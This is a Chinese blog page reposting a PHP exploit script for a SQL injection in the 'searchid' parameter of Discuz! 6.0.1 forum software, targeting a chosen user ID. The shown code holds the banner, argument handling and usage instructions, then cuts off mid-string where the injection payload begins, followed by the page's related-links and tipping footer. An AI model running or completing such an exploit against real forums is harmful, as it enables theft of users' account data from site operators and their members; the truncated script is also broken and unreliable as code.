Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit


本文整理自网络,侵删。

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

更多关于Discuz论坛内容来自木庄网络博客


标签:Discuz论坛

相关阅读 >>

Discuz论坛用户通过邮件验证的设置方法[图文]

telnet 服务器的25端口不通(无法发送邮件)的解决办法

修改destoon会员公司的伪静态中的com目录的方法

Discuz论坛更换域名,详细文件修改步骤

xss攻击汇总 做网站安全的朋友需要注意下

almp 安卓系统上搭建本地php服务器环境的步骤

windows php+discuz环境搭建推荐教程(图文)

如何使用“php” 彩蛋进行敏感信息获取

js实现改进的仿蓝色论坛导航菜单效果代码

php版本的选择5.2.17 5.3.27 5.3.28 5.4 5.5兼容性问题分析

更多相关阅读请进入《Discuz论坛》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...